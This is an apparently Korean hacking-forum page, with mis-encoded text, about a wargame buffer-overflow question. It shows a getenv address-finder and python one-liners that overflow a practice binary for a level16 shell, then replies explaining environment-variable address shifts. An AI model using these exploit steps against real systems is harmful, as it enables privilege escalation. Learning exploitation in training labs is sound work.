½Ã½ºÅÛ ÇØÅ·

 1574, 17/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tjdalstjr938
   ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ BOF °ø°Ý½Ã Àǹ®Á¡ Áú¹®ÀÔ´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=1910 [º¹»ç]


[level15@ftz tmp]$export SCD=`python -c 'print "\xef\xbe\xad\xde"'`

#include <stdio.h>

main()
{
        printf("Address of SHELLCODE : 0x%x\n", getenv("SCD"));
}

[level15@ftz tmp]$ ./abc
Address of SHELLCODE : 0xbffffe87
[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x87\xfe\xff\xbf"';cat) | ../attackme

[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x7B\xfe\xff\xbf"';cat) | ../attackme
whoami
level16

getenv¸¦ ÀÌ¿ëÇÏ¿© ³ª¿Â ÁÖ¼Ò´Â bffffe87 Àε¥ ½ÇÁ¦ °ø°ÝÀ» ¼öÇàÇÏ·Á¸é bffffe7b¸¦ ÀÔ·ÂÀ» ÇØÁà¾ß °ø°ÝÀÌ ¼öÇà µÇ´õ¶ó°í¿ä.
ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÏ¿©¼­ ¹®Á¦¸¦ Ç®¶§¸¶´Ù °ø°Ý½Ã ÀÌ¿ëÇÏ´Â ÁÖ¼Ò¶û getenvÀÇ Ãâ·Â °ªÀ̶û ´Ù¸£´øµ¥ ÀÌÀ¯¶û ±× »çÀÌ °ª¿¡´Â ¾î¶² °ªµéÀÌ µé¾î°¡°Ô µÇ´ÂÁö ¾Ë·ÁÁֽǼö ÀÖÀ¸½Å°¡¿ä? ¤Ð¤Ð
  Hit : 2414     Date : 2018/01/02 04:12


    
gihacker ȯ°æº¯¼ö¿¡ pwd °¡ Àִµ¥ ÀÌ pwd ´Â ÇöÁ¦ µð·ºÅ丮¸¦ ÀúÀåÇÏ°í ÀÖ´Â º¯¼ö¶ó ½ÇÇàÇÏ´Â À§Ä¡°¡ ´Ù¸£¸é ȯ°æº¯¼öµµ ´Ù¸£°Ô ½ÇÇàµÇ±¸¿ä ´Ù¸¥ º¯¼öµµ Á¶±Ý¾¿ ¹Ù²î´Â °æ¿ì°¡ÀÖ¾î¿ä Çѹø ã¾Æº¸¼¼¿ä 2018/01/02  
tjdalstjr938 ã¾Æº» ¹Ù·Î´Â ÆÄÀÏÀÇ Àüü À̸§ÀÇ ±æÀÌ°¡ °°¾Æ¾ß µÇ¼­ µ¿ÀÏÇÑ À§Ä¡ ¿Í À̸§ ±æÀÌ°¡ °°¾Æ¾ß Á¤È®ÇÑ ÁÖ¼Ò¸¦ ¾òÀ»¼ö ÀÖ´Ù°í ³ª¿À´Âµ¥ ´Ù¸¥ À§Ä¡¿¡¼­ Á¤È®ÇÑ ÁÖ¼Ò¸¦ ã´Â ¹æ¹ýÀ» ¾øÀ»±î¿ä? 2018/01/02  
gihacker Èì env ¸í·É¾î·Î ¹«¾ùÀÌ ´Ù¸¥Áö º¸°í ä¿öÁÖ¸é µÉ°Í°°³×¿ä 2018/01/02  
tjdalstjr938 ´äº¯ °¨»çÇÕ´Ï´Ù. ´öºÐ¿¡ Çϳª ¾Ë¾Æ°©´Ï´Ù. 2018/01/02  
gihacker ¿­°øÇϼ¼¿ä~ 2018/01/02  
1254   gcc 2.96½ºÅñ¸Á¶ÀÇ º¯È­ ¾î¶»°Ô ¾Ë ¼ö ÀÖ³ª¿ä?[4]     topnons
 01/02 3484
1253   »çÀ̹ö¼ö»ç´ëÁú¹®Á¡[1]     tolta
 01/13 3243
1252   ¶Ç Áú¹®ÇÔ[1]     tolta
 04/19 3021
1251   ¶Ç »çÀ̹ö¼ö»ç´ë Áú¹®Á¡¿© ¤»....[2]     tolta
 01/15 3141
1250   Áú¹®Á»ÇÏ°Ù½À´Ï´Ù[4]     tolta
 02/25 3415
1249   NC¼ÒÇÁÆ®¸¦ »ó´ë·Î ¼Ò¼Û ÁغñÁß¿¡ ÀÖ½À´Ï´Ù.      TOGEACE
 12/09 3394
1248   ¸¹Àº´äº¯¹Ù¶÷´Ï´Ù...[4]     tnvlfdl1
 03/09 3191
1247   ¾Æ ¹ÌÃĹö¸®³×-.-[2]     tlsdbcjs
 03/31 3812
1246   À¥ÇØÅ· ½ÎÀÌÆ® ÀÖ³ª¿ä?[3]     tlsdbcjs
 03/09 4561
1245   °£´ÜÇÑ Áú¹®Á»...[1]     tlqaksqhr
 12/06 3163
1244   rop ´ÙÀ½¿¡ ¹¹¸¦ °øºÎÇÏ´Â°Ô ÁÁÀ»±î¿ä?[1]     tloet
 08/26 2098
1243   µµ¿ÍÁÖ¼¼¿ä~[1]     tkfkwufk
 06/18 3279
1242   pwntools ¸¦ ÀÌ¿ëÇÑ Àͽº Áú¹®[6]     tkakr7458
 04/16 7430
1241   format string bug + got overwite[3]     tkakr7458
 04/19 2474
1240   ½©Äڵ带 ÀÌ¿ëÇؼ­ bof ¸¦ ÇÒ¶§[4]     tkakr7458
 05/22 2742
1239   ÇØÄ¿½ºÄð¿¡¼­ Á¦°øÇÏ´Â BOF º¸°í ÇÏ´øµµÁß Áú¹®ÀÔ´Ï´Ù.     tjzmfls
 10/11 2904
1238   Áú¹®ÀÌÀÖ¾î¿ä!![4]     tjdqlsd234
 10/09 3134
1237   Àú±â¿ä ÇØÅ· ÇÒ¶§¿ä[3]     tjdkstn
 02/07 3501
1236   ´ëÇб³¶õ ½Ã½ºÅÛÇØÅ· 21°­ºÎÅÍ 26°­ ¸øµé¾î°¡°ÔÇسù³×¿ä[6]     tjddnr0306
 05/24 3815
  ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ BOF °ø°Ý½Ã Àǹ®Á¡ Áú¹®ÀÔ´Ï´Ù.[5]     tjdalstjr938
 01/02 2413
[1]..[11][12][13][14][15][16] 17 [18][19][20]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org